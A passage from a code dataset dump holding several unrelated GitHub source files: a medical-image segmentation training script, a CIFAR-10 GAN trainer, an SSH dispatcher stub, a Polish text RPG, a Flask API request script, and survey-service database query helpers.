all_acc.append([acc])\n all_auc.append([auc])\n all_sen.append(list(Sensitivity))\n all_spe.append(list(Specificity))\n all_bacc.append(list(BACC))\n pbar.update(image.size()[0])\n mDice = np.array(all_dice).mean()\n mIoU = np.array(all_iou).mean()\n mAcc = np.array(all_acc).mean()\n mAuc = np.array(all_auc).mean()\n mSensitivity = np.array(all_sen).mean()\n mSpecificity = np.array(all_spe).mean()\n mBACC = np.array(all_bacc).mean()\n \n print(f'\\r [VAL] mDice:{mDice:0.2f}, mIoU:{mIoU:0.2f}, mAcc:{mAcc:0.2f}, mAuc:{mAuc:0.2f}, mSen:{mSensitivity:0.2f}, mSpec:{mSpecificity:0.2f}, mBACC:{mBACC:0.2f}')\n\n return mDice, mIoU, mAcc, mSensitivity, mSpecificity, mAuc, mBACC\n\n\n\ndef test(model, device, args, num_fold=0):\n if os.path.exists(args.val_result_file):\n with open(args.val_result_file, \"r\") as f:\n reader = csv.reader(f)\n val_result = list(reader)\n best_epoch = utils.best_model_in_fold(val_result, num_fold)\n else:\n best_epoch = args.num_epochs\n model_dir = os.path.join(args.checkpoint_dir[num_fold], f'CP_epoch{best_epoch}.pth')\n model.load_state_dict(torch.load(model_dir, map_location=device)[\"state_dict\"])\n print(f'\\rtest model loaded: [fold:{num_fold}] [best_epoch:{best_epoch}]')\n\n dataset_test = myDataset(args.data_root, args.target_root, args.crop_size, \"test\",\n k_fold=args.k_fold, imagefile_csv=args.dataset_file_list, num_fold=num_fold,data_root_aux=args.data_root_aux,)\n dataloader = DataLoader(dataset_test, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers, pin_memory=True)\n\n all_dice = []\n all_iou = []\n all_acc = []\n all_auc = []\n all_sen = []\n all_spe = []\n all_bacc = []\n model.eval()\n with torch.no_grad():\n with tqdm(total=len(dataset_test), desc=f'TEST fold {num_fold}/{args.k_fold}', unit='img') as pbar:\n for batch in dataloader:\n image = batch[\"image\"]\n label = batch[\"label\"]\n file = batch[\"file\"]\n assert len(image.size()) == 4\n assert len(label.size()) == 3\n image = image.to(device, dtype=torch.float32)\n label = label.to(device, dtype=torch.long)\n\n outputs = model(image)\n pred = outputs[\"main_out\"]\n\n if args.tt_aug:\n for i, axis in enumerate([[2], [3], [2, 3]]):\n image_tmp = torch.flip(image, dims=axis)\n pred_tmp = model(image_tmp)[\"main_out\"]\n pred_tmp = torch.flip(pred_tmp, dims=axis)\n pred += pred_tmp\n pred = pred / 4\n\n pred = torch.exp(pred).max(dim=1)[1]\n\n for b in range(image.size()[0]):\n hist = utils.fast_hist(label[b,:,:], pred[b,:,:], args.n_class)\n dice, iou, acc, Sensitivity, Specificity, bacc = utils.cal_scores(hist.cpu().numpy(), smooth=0.01)\n auc = utils.calc_auc(pred[b, :, :], label[b, :, :])\n\n test_result = [file[b], dice.mean()]+list(dice)+[iou.mean()]+list(iou)+[acc] + \\\n [Sensitivity.mean()]+list(Sensitivity)+[Specificity.mean()]+list(Specificity)+ \\\n [bacc.mean()]+list(bacc)\n with open(args.test_result_file, \"a\") as f:\n w = csv.writer(f)\n w.writerow(test_result)\n\n all_dice.append(list(dice))\n all_iou.append(list(iou))\n all_acc.append([acc])\n all_auc.append([auc])\n all_sen.append(list(Sensitivity))\n all_spe.append(list(Specificity))\n all_bacc.append(list(bacc))\n if args.plot:\n file_name, _ = os.path.splitext(file[b])\n save_image(pred[b,:,:].cpu().float().unsqueeze(0), os.path.join(args.plot_save_dir, file_name + f\"_pred_{dice.mean():.2f}.png\"), normalize=True)\n\n pbar.update(image.size()[0])\n\n print(f\"\\r---------Fold {num_fold} Test Result---------\")\n print(f'mDice: {np.array(all_dice).mean()}')\n print(f'mIoU: {np.array(all_iou).mean()}')\n print(f'mAcc: {np.array(all_acc).mean()}')\n print(f'mAuc: {np.array(all_auc).mean()}')\n print(f'mSens: {np.array(all_sen).mean()}')\n print(f'mSpec: {np.array(all_spe).mean()}')\n print(f'mBACC: {np.array(all_bacc).mean()}')\n\n if num_fold == 0:\n utils.save_print_score(all_dice, all_iou, all_acc, all_auc, all_sen, all_spe, all_bacc, args.test_result_file, args.label_names)\n return\n\n return all_dice, all_iou, all_acc, all_auc, all_sen, all_spe, all_bacc\n\n\n\nif __name__ == \"__main__\":\n\n seed = 12345\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)####\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.cuda.empty_cache()\n cudnn.benchmark = True\n\n args = basic_setting()\n assert args.k_fold != 1\n os.environ['CUDA_VISIBLE_DEVICES'] = args.cuda_id\n\n if (not os.path.exists(args.dataset_file_list)) and (args.k_fold is not None):\n utils.get_dataset_filelist(args.data_root, args.dataset_file_list)\n\n if args.dataset == 'OCTA-3M':\n from dataset.dataset_3M import *\n elif args.dataset == 'OCTA-6M':\n from dataset.dataset_6M import *\n elif args.dataset == 'ROSE':\n from dataset.dataset_ROSE import *\n elif args.dataset == 'OCTA-SS':\n from dataset.dataset_SS import *\n else:\n print(\"dataset is not chosen\")\n\n mode = args.mode\n if args.k_fold is None:\n print(\"k_fold is None\")\n if mode == \"train_test\":\n args.mode = \"train\"\n print(\"###################### Train Start & \" + args.network + \" ######################\")\n main(args)\n args.mode = \"test\"\n print(\"###################### Test Start & \" + args.network + \" ######################\")\n main(args)\n else:\n main(args)\n else:\n if mode == \"train_test\":\n print(\"###################### Train & Test Start & \"+ args.network + \" ######################\")\n\n if mode == \"train\" or mode == \"train_test\":\n args.mode = \"train\"\n print(\"###################### Train Start & \" + args.network + \" ######################\")\n for i in range(args.start_fold, args.end_fold):\n torch.cuda.empty_cache()\n main(args, num_fold=i + 1)\n\n if mode == \"test\" or mode == \"train_test\":\n args.mode = \"test\"\n print(\"###################### Test Start & \" + args.network + \" ######################\")\n all_dice = []\n all_iou = []\n all_acc = []\n all_sen = []\n all_spe = []\n for i in range(args.start_fold, args.end_fold):\n Dice, IoU, Acc, Sensitivity, Specificity = main(args, num_fold=i + 1)\n all_dice += Dice\n all_iou += IoU\n all_acc += Acc\n all_sen += Sensitivity\n all_spe += Specificity\n utils.save_print_score(all_dice, all_iou, all_acc, all_sen, all_spe, args.test_result_file, args.label_names)\n\n\n\n\n\n\n\n","repo_name":"coreeey/OCT2Former","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14345,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"43"} +{"seq_id":"72019979329","text":"#### CIFAR_10 ResNet GB-GAN\n\n## Main changes: 1.optimize input pool\n## 2.loss func built-in\n\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'\n\nimport argparse\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport torch.autograd as autograd\n\nfrom network import Discriminator_Res, Generator, weights_init_normal, weights_init_xavier, weights_init_kaiming\nfrom models.resnet import * \nfrom utils import img_truncate, PoolSet, inception_score\n#from util import plot_scatter, plot_scatter_label, weights_init, compute_acc\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--z_dim', type=int, default=100, help='size of the latent z vector')\nparser.add_argument('--num_epoch', type=int, default=1000, help='number of epochs to train for')\nparser.add_argument('--G_batch_size', type=int, default=128) #?\nparser.add_argument('--pool_size_t', type=int, default=10)\n\nparser.add_argument('--lr_d', type=float, default=0.001, help='learning rate discriminator, default=0.0002')\nparser.add_argument('--eta', type=float, default=.01, help='Update rate for each period') #?default resonable?\nparser.add_argument('--lr_g', type=float, default=0.01, help='learning rate generator, default=0.0002')\nparser.add_argument('--dsteps', type=int, default=1, help='Num of steps of Discriminator for one step Generator')\nparser.add_argument('--G_optimizer', type=str, default='Adam', help='Adam od SGD')\nparser.add_argument('--batch_size', type=int, default=100, help='input batch size')\nparser.add_argument('--init', type=str, default='xavier', help='xavier, kaiming or normal')\n\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--period', type=int, default=20)\nparser.add_argument('--G_epoch', type=int, default=10, help='number of epochs to train for') #default?\n\nparser.add_argument('--workers', type=int, default=4, help='number of data loading workers')\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\nparser.add_argument('--disc', type=str, default='Res', help='DC or Res')\nparser.add_argument('--exp', type=str, default='001')\n#parser.add_argument('--manualSeed', type=int, help='manual seed')\n\nopt = parser.parse_args()\nprint(opt)\n\n# specify the gpu id if using only 1 gpu\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\ntry:\n os.mkdir('./exp')\nexcept:\n pass\n\ntry:\n os.mkdir('./exp/' + opt.exp)\n os.mkdir('./exp/' + opt.exp + '/results')\n os.mkdir('./exp/' + opt.exp + '/results/fix')\n os.mkdir('./exp/' + opt.exp + '/results/random')\nexcept:\n pass\n\n\ntry:\n os.mkdir('./exp/' + opt.exp + '/results/loss_monitor')\nexcept:\n pass\n\nwith open('./exp/' + opt.exp + '/loss.txt', 'a') as inFile:\n print(opt, file=inFile)\n\n# dataset CIFAR10\ndataset = datasets.CIFAR10(\n root='./data', download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), # --> [-1, 1]\n ]))\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batch_size,\n shuffle=True)\n\n\nif opt.init == 'xavier':\n weights_init_ = weights_init_xavier\nelif opt.init == 'kaiming':\n weights_init_ = weights_init_kaiming\nelif opt.init == 'normal':\n weights_init_ = weights_init_normal\nelse:\n raise NameError('Wrong Initialization')\n\nnetG = Generator(z_dim=opt.z_dim)\nnetG.apply(weights_init_)\nnetG.to(device)\n\nif opt.disc == 'Res':\n netD = Discriminator_Res()\nelif opt.disc == 'DC':\n netD = Discriminator_DC()\nelse:\n raise NameError('Wrong Discriminator')\nnetD.apply(weights_init_)\nnetD.to(device)\n\n## Resuming Models\nif opt.resume:\n # Load checkpoint.\n print('==> Resuming from checkpoint..')\n assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'\n state = torch.load('./checkpoint/cifar_exp_' + opt.exp +'.t7')\n netG.load_state_dict(state['netG'])\n netD.load_state_dict(state['netD'])\n start_epoch = state['epoch'] + 1\n is_score = state['is_score']\n best_is = state['best_is']\n loss_G = state['loss_G']\n loss_D = state['loss_D']\n grad_G = state['grad_G']\n\nelse:\n start_epoch = 0\n is_score = []\n best_is = 0.0\n loss_G = []\n loss_D = []\n grad_G = []\n\nnetIncept = ResNet18()\nnetIncept.to(device)\nnetIncept = torch.nn.DataParallel(netIncept)\nif not torch.cuda.is_available():\n checkpoint = torch.load('./checkpoint/res18_ckpt_cifar10.t7', map_location=lambda storage, loc: storage)\n netIncept.load_state_dict(checkpoint['net'])\n #net_feat.load_state_dict(checkpoint['net'])\n\nelse:\n checkpoint = torch.load('./checkpoint/res18_ckpt_cifar10.t7')\n netIncept.load_state_dict(checkpoint['net'])\n #net_feat.load_state_dict(checkpoint['net'])\n\nprint('-----------NetLoad Finished')\n\npool_size = opt.batch_size * opt.pool_size_t\n\n## training placeholder\nz_b = torch.FloatTensor(opt.batch_size, opt.z_dim).to(device)\nimg_b = torch.FloatTensor(opt.batch_size, 3, 32, 32).to(device)\np_z = torch.FloatTensor(pool_size, opt.z_dim).to(device)\np_img = torch.FloatTensor(pool_size, 3, 32, 32).to(device)\nd_b = torch.FloatTensor(opt.batch_size).to(device) # disc label\n\n## evaluation placeholder\nshow_z_b = torch.FloatTensor(64, opt.z_dim).to(device)\neval_z_b = torch.FloatTensor(250, opt.z_dim).to(device) # 250/batch * 120 --> 300000\n\n## fix evaluation place holder\nfix_show_z = torch.FloatTensor(64, opt.z_dim).to(device)\nfix_show_z.normal_()\n\noptim_D = optim.RMSprop(netD.parameters(), lr=opt.lr_d) # other param?\noptim_G = optim.Adam(netG.parameters(), lr=opt.lr_g, betas=(opt.beta1, 0.999)) #?suitable\n#scheduler_D = optim.lr_scheduler.StepLR(optim_D, step_size=200, gamma=.1)\n#scheduler_G = optim.lr_scheduler.StepLR(optim_G, step_size=200, gamma=.1)\n\ncriterion_G = nn.MSELoss()\ncriterion_D = nn.BCEWithLogitsLoss() ## Sigmoid + BCE, input is score\n\nfor epoch in range(start_epoch, start_epoch + opt.num_epoch):\n #print('Start epoch: %d' % epoch)\n ## input_pool: [pool_size, opt.z_dim] -> [pool_size, 32, 32]\n #scheduler_G.step()\n #scheduler_D.step()\n\n netD.train()\n netG.eval()\n p_z.normal_()\n p_img.copy_(netG(p_z).detach())\n\n loss_D_t = []\n loss_G_t = []\n grad_G_t = []\n\n for t in range(opt.period): \n\n for _ in range(opt.dsteps):\n \n t = time.time()\n ### Update D\n netD.zero_grad()\n ## real\n real_img, _ = next(iter(dataloader)) # [batch_size, 1, 32, 32]\n img_b.copy_(real_img.to(device))\n real_D_err = criterion_D(netD(img_b), d_b.fill_(1))\n #real_D_err = torch.log(1 + torch.exp(-netD(img_b))).mean()\n real_D_err.backward()\n\n ## fake\n z_b_idx = random.sample(range(pool_size), opt.batch_size)\n img_b.copy_(p_img[z_b_idx])\n fake_D_err = criterion_D(netD(img_b), d_b.fill_(0))\n #fake_D_err = torch.log(1 + torch.exp(netD(img_b))).mean() # torch scalar[]\n fake_D_err.backward()\n\n loss_D_t.append((real_D_err+fake_D_err).detach().cpu().item())\n #print(loss_D_t[-1])\n #print((real_D_err+fake_D_err).detach().cpu().item())\n optim_D.step()\n\n ## update input pool \n p_img_t = p_img.clone().to(device) ##!!DOUBLE SIZE OF INPUT POOL\n p_img_t.requires_grad_(True)\n if p_img_t.grad is not None:\n p_img_t.grad.zero_()\n fake_D_score = netD(p_img_t)\n fake_D_err = criterion_D(fake_D_score, torch.ones(pool_size).to(device)).detach().cpu().item()\n\n #fake_D_score.backward(torch.ones(pool_size).to(device))\n #p_update = p_img_t.grad * opt.eta\n dsdimg = autograd.grad(outputs=fake_D_score, inputs=p_img_t, \n grad_outputs=torch.ones(pool_size).to(device),\n retain_graph=False)[0]\n p_update = dsdimg * opt.eta\n p_img = img_truncate(p_img + p_update)\n\n loss_G_t.append(fake_D_err)\n grad_G_t.append(np.abs(p_update.detach().cpu().numpy()).mean())\n\n ##update G after several steps\n netG.train()\n netD.eval()\n poolset = PoolSet(p_z.cpu(), p_img.cpu())\n poolloader = torch.utils.data.DataLoader(poolset, batch_size=opt.G_batch_size, shuffle=True)\n\n ## record epoch loss\n loss_G.append(np.mean(loss_G_t))\n loss_D.append(np.mean(loss_D_t))\n grad_G.append(np.mean(grad_G_t)) # ave update / ave #pixels larger than .5\n\n for _ in range(opt.G_epoch):\n\n approx_G_t = []\n for _, data_ in enumerate(poolloader, 0):\n netG.zero_grad()\n\n input_, target_ = data_\n pred_ = netG(input_.to(device))\n loss = criterion_G(pred_, target_.to(device))\n loss.backward()\n\n optim_G.step()\n approx_G_t.append(loss.detach().cpu().item())\n\n approx_G = np.mean(approx_G_t)\n\n normD = netD.linear.weight.norm().cpu().item()\n normG= netG.map[1].weight.norm().cpu().item()\n print('[%d], D loss:%.4f, G loss:%.4f, G approx:%.4f, Ave Update:%.4f, G norm:%.4f, D norm:%.4f' \n % (epoch, loss_D[-1], loss_G[-1], approx_G, grad_G[-1], normG , normD))\n\n \n # if epoch % 1 == 0:\n # fig = plt.figure()\n # plt.plot(loss_G, label='approximator loss')\n # plt.xlabel('Epoch, update for each approximator G')\n # plt.legend()\n # fig.savefig('./loss_monitor/Approximator'+ str(epoch).zfill(4) + '.png')\n # plt.close()\n\n # evaluation\n # show image\n if epoch % 20 == 0:\n \n netG.eval()\n show_z_b.normal_()\n ## show eval images\n fake_img = netG(show_z_b) #[N,1,28,28] torch.(cuda).tensor\n vutils.save_image((.5*fake_img+.5).detach().cpu() , './exp/'+ opt.exp + '/results/random/'+str(epoch).zfill(4)+'.png')\n ## show eval fixed images\n fake_img = netG(fix_show_z)\n vutils.save_image((.5*fake_img+.5).detach().cpu(), './exp/'+ opt.exp + '/results/fix/'+str(epoch).zfill(4)+'.png')\n\n # inception, diversity, FID scores.\n if epoch % 25 == 0:\n is_score.append(inception_score(netIncept, netG, device, opt.z_dim))\n with open('./exp/' + opt.exp + '/loss.txt', 'a') as append_File:\n print('[%d], Inception Score:%.4f, D loss:%.4f, G loss:%.4f, G approx:%.4f ,Ave Update:%.4f, G norm:%.4f, D norm:%.4f' \n % (epoch, is_score[-1], loss_D[-1], loss_G[-1], approx_G, grad_G[-1], normG , normD), file=append_File)\n print('IS score: %.4f' % is_score[-1])\n best_is = max(is_score[-1], best_is)\n\n fig = plt.figure()\n plt.plot(25 * (np.arange(epoch//25 + 1)), is_score, label='IS')\n plt.xlabel('Epoch, update for each approximator G')\n plt.legend()\n fig.savefig('./exp/'+ opt.exp +'/InceptionScore.png')\n plt.close()\n\n if best_is == is_score[-1]:\n print('Saving, with best is_score: %.4f' % is_score[-1])\n state = {\n 'netG': netG.state_dict(),\n 'netD': netD.state_dict(),\n 'is_score': is_score,\n 'loss_G': loss_G,\n 'epoch': epoch,\n 'best_is': best_is,\n 'loss_D': loss_D,\n 'grad_G': grad_G\n }\n torch.save(state, './checkpoint/cifar_exp_' + opt.exp +'.t7')\n ## print loss ?","repo_name":"deeplearning-math/deeplearning-math.github.io","sub_path":"2018Fall/Project2/11.GuZhuLiu/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11641,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"43"} +{"seq_id":"74580570369","text":"import sys\n\nfrom Connector.SshTypes import SshTypes\n\n\nclass SshTypeNotFound(Exception):\n \"\"\" SshTypeNotFound \"\"\"\n\n\nclass SshDispatcher:\n @staticmethod\n def dispatchCommand(type: int, args: dict):\n if type == SshTypes.EXECUTE:\n \"\"\" EXECUTE \"\"\"\n elif type == SshTypes.DOWNLOAD_FILE:\n \"\"\" DOWNLOAD_FILE \"\"\"\n elif type == SshTypes.UPLOAD_FILE:\n \"\"\" UPLOAD_FILE \"\"\"\n else:\n raise SshTypeNotFound()\n","repo_name":"IgRich/LaravelUtility","sub_path":"Connector/ssh_helper.py","file_name":"ssh_helper.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33000541655","text":"#===============importy================\r\nfrom random import randint\r\nfrom kartofel import Sklep\r\nfrom kartofel import Zwykły_atak\r\nfrom kartofel import Podwójny_atak\r\nfrom kartofel import Leczenie\r\nfrom kartofel import Leczenie_mala_potka\r\nfrom kartofel import Leczenie_srednia_potka\r\nfrom kartofel import Leczenie_duza_potka\r\nfrom kartofel import Wybierzleczenie\r\nfrom kartofel import Upgrade\r\nfrom kartofel import Przeciwnik\r\n\r\n#===============bohater================\r\n\r\nbio = {\r\n \"imie\": None,\r\n \"maxhp\": 100,\r\n \"hp\": 100,\r\n \"poziom\": 1,\r\n \"coin\": 1000,\r\n \"enemyhp\": 30,\r\n \"lvl_miecza\":1, \r\n \"lvl_zbroji\":1\r\n }\r\n\r\n\r\n#==============przedmioty==============\r\n\r\nshopitems = {\r\n \"miecz\" : \"miecz\",\r\n \"zbroja\" : \"zbroja\",\r\n \"mala_potka\" : \"mala potka\",\r\n \"srednia_potka\" : \"srednia potka\",\r\n \"duza_potka\" : \"duza potka\"\r\n }\r\n\r\n\r\nmyitems = []\r\n\r\n#===========dane przeciwnika=============\r\n\r\ndane_przeciwnik={\r\n \"nazwa\" : None,\r\n \"enemyatack\" : randint(1,3),\r\n \"enemycoin\": randint(0,25),\r\n \"pokonane_bosy\" : 0, \r\n \"pokonani_przeciwnicy\": 0\r\n}\r\n\r\n\r\n#========================================\r\n\r\nbio[\"imie\"] = input(\"podaj imie swojego bohatera:\\n\")\r\n\r\ninput(f'\\n{bio[\"imie\"]} Zaczynasz swoją podróż')\r\nprint(f\"twoje statystyki:\\n\\n {bio}\")\r\n\r\nwhile bio[\"hp\"] > 0:\r\n bio[\"maxhp\"]>= bio[\"hp\"]\r\n print('-'*50)\r\n print(f'Twoje przedmioty: {myitems}')\r\n print(f\"twoje statystyki:\\n\\n {bio}\")\r\n print('1 - walka')\r\n print('2 - sklep\\n\\n')\r\n inp = input('Co chcesz zrobić? ')\r\n if inp == 'stop':\r\n break\r\n elif inp == '1':\r\n if bio[\"poziom\"] % 5 == 0:\r\n print('!'*50)\r\n print('Nadszedł czas na walkę z Bossem!')\r\n dane_przeciwnik[\"nazwa\"] = \"boss\"\r\n bio[\"enemyhp\"] = 40\r\n while bio[\"enemyhp\"] > 0 and bio[\"hp\"] > 0 :\r\n Przeciwnik.enemy_atak(bio, dane_przeciwnik)\r\n w = int(input(\"co chcesz zrobic?\\n\\n 1 - atak\\n2 - leczenie\"))\r\n if w == 1:\r\n odp = int(input(\"wybierz atak\\n\\n 1 - zwykły atak\\n 2 - podwójny atak\"))\r\n if odp == 1:\r\n Zwykły_atak(bio)\r\n elif odp == 2:\r\n Podwójny_atak(bio, myitems)\r\n elif w == 2:\r\n d = int(input())\r\n Wybierzleczenie.wybieranieleczenia(d, bio, myitems)\r\n else:\r\n if bio[\"enemyhp\"] < 0 and bio[\"hp\"] >0:\r\n Przeciwnik.enemy_atak(bio, dane_przeciwnik)\r\n Przeciwnik.enemy_coiny(bio, dane_przeciwnik)\r\n bio[\"poziom\"] = bio[\"poziom\"] + 1\r\n print(f\"twoje statystyki:\\n {bio}\\n\\n pokonane bossy:{dane_przeciwnik['pokonane_bosy']}, pokonani przeciwnicy:{dane_przeciwnik['pokonani_przeciwnicy']}\")\r\n elif bio[\"enemyhp\"] > 0 and bio[\"hp\"] <= 0:\r\n print('przegrałeś')\r\n break\r\n\r\n if bio[\"poziom\"] % 5 != 0:\r\n print('!'*50)\r\n print('Nadszedł czas na walkę z przeciwnikiem!')\r\n dane_przeciwnik[\"nazwa\"] = \"przeciwnik\"\r\n bio[\"enemyhp\"] = 20\r\n while bio[\"enemyhp\"] > 0 and bio[\"hp\"] > 0 :\r\n Przeciwnik.enemy_atak(bio, dane_przeciwnik)\r\n w = int(input(\"co chcesz zrobic?\\n\\n 1 - atak\\n2 - leczenie\"))\r\n if w == 1:\r\n odp = int(input(\"wybierz atak\\n\\n 1 - zwykły atak\\n 2 - podwójny atak\"))\r\n if odp == 1:\r\n Zwykły_atak(bio)\r\n elif odp == 2:\r\n Podwójny_atak(bio, myitems)\r\n elif w == 2:\r\n d = int(input())\r\n Wybierzleczenie.wybieranieleczenia(d, bio, myitems)\r\n else:\r\n if bio[\"enemyhp\"] < 0 and bio[\"hp\"] >0:\r\n Przeciwnik.enemy_atak(bio, dane_przeciwnik)\r\n Przeciwnik.enemy_coiny(bio, dane_przeciwnik)\r\n bio[\"poziom\"] = bio[\"poziom\"] + 1\r\n print(f\"twoje statystyki:\\n {bio}\\n\\n pokonane bossy:{dane_przeciwnik['pokonane_bosy']}, pokonani przeciwnicy:{dane_przeciwnik['pokonani_przeciwnicy']}\")\r\n elif bio[\"enemyhp\"] > 0 and bio[\"hp\"] <= 0:\r\n print('przegrałeś')\r\n break\r\n\r\n elif inp == \"2\":\r\n co = input(\"co chcesz zrobić?\\n\\n 1 - kupic\\n2 - ulepszyc\")\r\n if co == '1':\r\n Sklep.przedstawienie()\r\n odp = input(\"decyzja:\")\r\n while odp != 'nic': \r\n if odp == \"1\":\r\n Sklep.kupmiecz(shopitems, bio, myitems)\r\n print(odp)\r\n odp = input(\"co jeszcze: \") \r\n elif odp == '2':\r\n Sklep.kupzbroje(shopitems, bio, myitems)\r\n odp = input(\"co jeszcze:\")\r\n elif odp == '3':\r\n Sklep.kupmalapotka(shopitems, bio, myitems)\r\n odp = input(\"co jeszcze: \") \r\n elif odp =='4':\r\n Sklep.kupsredniapotka(shopitems, bio, myitems)\r\n odp = input(\"co jeszcze: \") \r\n elif odp == '5':\r\n Sklep.kupduzapotka(shopitems, bio, myitems)\r\n odp = input(\"co jeszcze: \") \r\n\r\n else:\r\n Sklep.zakonczenie(myitems)\r\n print(myitems)\r\n elif co == '2':\r\n Upgrade.wybierzulepszenie()\r\n odpp = input(\"decyzja:\")\r\n while odpp != \"nic\":\r\n Upgrade.upgrady(odpp, bio, myitems)\r\n print(bio[\"lvl_miecza\"])\r\n odpp = input(\"czy coś jeszcze? \")\r\n else:\r\n Upgrade.konieculepszaniachyba(bio)\r\n\r\nelse:\r\n print(bio)\r\n print(dane_przeciwnik[\"pokonane_bosy\"])\r\n print[dane_przeciwnik[\"pokonani_przeciwnicy\"]]\r\n\r\n\r\n \r\n","repo_name":"huhhsss/boje-sie-tego-projektu---","sub_path":"rozgryweczka.py","file_name":"rozgryweczka.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20058440638","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 17 16:49:54 2020\n\n@author: Rachit J\n\"\"\"\n\nimport requests\nfrom data_input import data_in\n\nURL = \"http://127.0.0.1:5000/predict\"\n\n# defining a params dict for the parameters to be sent to the API \nheaders = {\"Content-Type\": \"application/json\"} \n\ndata = {\"input\":data_in}\n\n\nr = requests.get(URL, headers = headers, json = data)\n\nr.json()","repo_name":"rachitj/ds_salary_project","sub_path":"FlaskAPI/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12003935035","text":"import logging\nimport re\n\nimport structlog\nfrom sqlalchemy import and_, distinct, func, or_\nfrom sqlalchemy.sql.functions import count\n\nfrom ras_party.models.models import (\n Business,\n BusinessAttributes,\n BusinessRespondent,\n Enrolment,\n EnrolmentStatus,\n PendingSurveys,\n Respondent,\n)\nfrom ras_party.support.util import obfuscate_email\n\nlogger = structlog.wrap_logger(logging.getLogger(__name__))\n\n\ndef query_enrolment_by_business_and_survey_and_status(business_id, survey_id, session):\n \"\"\"\n Query to return total enrolments against businesses is and survey id\n :param business_id: business party id\n :param survey_id: survey id\n :param session: db session\n :return: the enrolment\n \"\"\"\n logger.info(\"Querying enrolment by business_id and survey_id\", business_id=business_id, survey_id=survey_id)\n return (\n session.query(Enrolment)\n .filter(Enrolment.business_id == business_id)\n .filter(Enrolment.survey_id == survey_id)\n .filter(or_(Enrolment.status == EnrolmentStatus.ENABLED, Enrolment.status == EnrolmentStatus.PENDING))\n )\n\n\ndef query_pending_surveys_by_business_and_survey(business_id, survey_id, session, is_transfer):\n \"\"\"\n Query to return total pending share against businesses is and survey id\n :param business_id: business party id\n :param survey_id: survey id\n :param session: db session\n :param is_transfer: boolean if the query is for transfer survey or share survey\n :return: the pending share\n \"\"\"\n logger.info(\"Querying pending share by business_id and survey_id\", business_id=business_id, survey_id=survey_id)\n return (\n session.query(PendingSurveys)\n .filter(PendingSurveys.business_id == business_id)\n .filter(PendingSurveys.survey_id == survey_id)\n .filter(PendingSurveys.is_transfer == is_transfer)\n ) # noqa\n\n\ndef query_businesses_by_party_uuids(party_uuids, session):\n \"\"\"\n Query to return businesses based on party uuids\n\n :param party_uuids: a list of party uuids\n :param session: db session\n :return: the businesses\n \"\"\"\n logger.info(\"Querying businesses by party_uuids\", party_uuids=party_uuids)\n return session.query(Business).filter(Business.party_uuid.in_(party_uuids))\n\n\ndef query_business_by_party_uuid(party_uuid, session):\n \"\"\"\n Query to return business based on party uuid\n\n :param party_uuid: the party uuid\n :return: business or none\n :rtype: Business\n \"\"\"\n logger.info(\"Querying businesses by party_uuid\", party_uuid=party_uuid)\n\n return session.query(Business).filter(Business.party_uuid == party_uuid).first()\n\n\ndef query_business_by_ref(business_ref, session):\n \"\"\"\n Query to return business based on business ref\n :param business_ref: the business ref\n :return: business or none\n :rtype: Business\n \"\"\"\n logger.info(\"Querying businesses by business_ref\", business_ref=business_ref)\n\n return session.query(Business).filter(Business.business_ref == business_ref).first()\n\n\ndef query_business_attributes(business_id, session):\n \"\"\"\n Query to return all business attributes records based\n\n :param business_id: the id of the business\n :param session: A database session\n :return: A list of businessAttributes that match the id\n :rtype: list of BusinessAttributes\n \"\"\"\n logger.info(\"Querying business attributes by id\", business_id=business_id)\n\n return session.query(BusinessAttributes).filter(BusinessAttributes.business_id == business_id).all()\n\n\ndef query_business_attributes_by_sample_summary_id(business_id, sample_summary_id, session):\n \"\"\"\n Query to return all business attributes records based. Will not error if no matches are found.\n\n :param business_id: the id of the business\n :param sample_summary_id: the id of the sample\n :param session: A database session\n :return: A list of businessAttributes that match the query parameters\n :rtype: list of BusinessAttributes\n \"\"\"\n logger.info(\n \"Querying business attributes by id and sample summary\",\n business_id=business_id,\n sample_summary_id=sample_summary_id,\n )\n conditions = [\n BusinessAttributes.business_id == business_id,\n BusinessAttributes.sample_summary_id == sample_summary_id,\n ]\n return session.query(BusinessAttributes).filter(and_(*conditions)).all()\n\n\ndef query_business_attributes_by_collection_exercise(business_id, collection_exercise_uuids, session):\n \"\"\"\n Query to return all business attributes records based. Will not error if no matches are found.\n\n :param business_id: the id of the business\n :param collection_exercise_uuids:\n :param session: A database session\n :return: A list of businessAttributes that match the query parameters\n :rtype: list of BusinessAttributes\n \"\"\"\n logger.info(\n \"Querying business attributes by id and collection exercise\",\n business_id=business_id,\n collection_exercise_uuids=collection_exercise_uuids,\n )\n conditions = [\n BusinessAttributes.business_id == business_id,\n BusinessAttributes.collection_exercise.in_(collection_exercise_uuids),\n ]\n return session.query(BusinessAttributes).filter(and_(*conditions)).all()\n\n\ndef 